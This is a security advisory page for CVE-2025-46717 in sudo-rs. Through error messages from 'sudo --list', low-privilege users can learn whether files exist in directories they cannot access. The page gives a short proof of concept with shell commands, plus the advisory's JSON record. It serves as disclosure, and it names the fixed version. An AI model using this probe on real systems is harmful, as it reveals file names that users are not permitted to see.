GHSA-98CV-WQJX-WX8F

Vulnerability from github – Published: 2025-05-13 14:08 – Updated: 2025-05-13 14:08
VLAI?
Summary
sudo-rs Allows Low Privilege Users to Discover the Existence of Files in Inaccessible Folders
Details

Summary

Users with no (or very limited) sudo privileges can determine whether files exists in folders that they otherwise cannot access using sudo --list <pathname>.

PoC

As root:

# mkdir /tmp/foo
# chmod a-rwx /tmp/foo
# touch /tmp/foo/secret_file

As a user without any (or limited) sudo rights:

$ sudo --list /tmp/foo/nonexistent_file
sudo-rs: '/tmp/foo/nonexistent_file': command not found
$ $ sudo --list /tmp/foo/secret_file
sudo-rs: Sorry, user eve may not run sudo on host.

I.e. the user can distinguish whether files exist.

Related

Original sudo (vulnerable version tested by us: 1.9.15p5) exhibited similar behaviour for files with the executable bit set.

Impact

Users with local access to a machine can discover the existence/non-existence of certain files, revealing potentially sensitive information in the file names. This information can also be used in conjunction with other attacks.

Credits

This issue was identified by sudo-rs developer Marc Schoolderman

Severity ?
3.3 (Low)
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.2.5"
      },
      "package": {
        "ecosystem": "crates.io",
        "name": "sudo-rs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.2.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-46717"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-497"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-05-13T14:08:18Z",
    "nvd_published_at": "2025-05-12T15:16:01Z",
    "severity": "LOW"
  },
  "details": "### Summary\n\nUsers with no (or very limited) sudo privileges can determine whether files exists in folders that they otherwise cannot access using `sudo --list \u003cpathname\u003e`.\n\n### PoC\n\nAs root:\n```\n# mkdir /tmp/foo\n# chmod a-rwx /tmp/foo\n# touch /tmp/foo/secret_file\n```\nAs a user without any (or limited) sudo rights:\n```\n$ sudo --list /tmp/foo/nonexistent_file\nsudo-rs: \u0027/tmp/foo/nonexistent_file\u0027: command not found\n$ $ sudo --list /tmp/foo/secret_file\nsudo-rs: Sorry, user eve may not run sudo on host.\n```\nI.e. the user can distinguish whether files exist.\n\n### Related\nOriginal sudo (vulnerable version tested by us: 1.9.15p5) exhibited similar behaviour for files with the executable bit set.\n\n### Impact\nUsers with local access to a machine can discover the existence/non-existence of certain files, revealing potentially sensitive information in the file names. This information can also be used in conjunction with other attacks.\n\n### Credits\nThis issue was identified by sudo-rs developer Marc Schoolderman",
  "id": "GHSA-98cv-wqjx-wx8f",
  "modified": "2025-05-13T14:08:18Z",
  "published": "2025-05-13T14:08:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/trifectatechfoundation/sudo-rs/security/advisories/GHSA-98cv-wqjx-wx8f"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46717"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/trifectatechfoundation/sudo-rs"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trifectatechfoundation/sudo-rs/releases/tag/v0.2.6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "sudo-rs Allows Low Privilege Users to Discover the Existence of Files in Inaccessible Folders"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.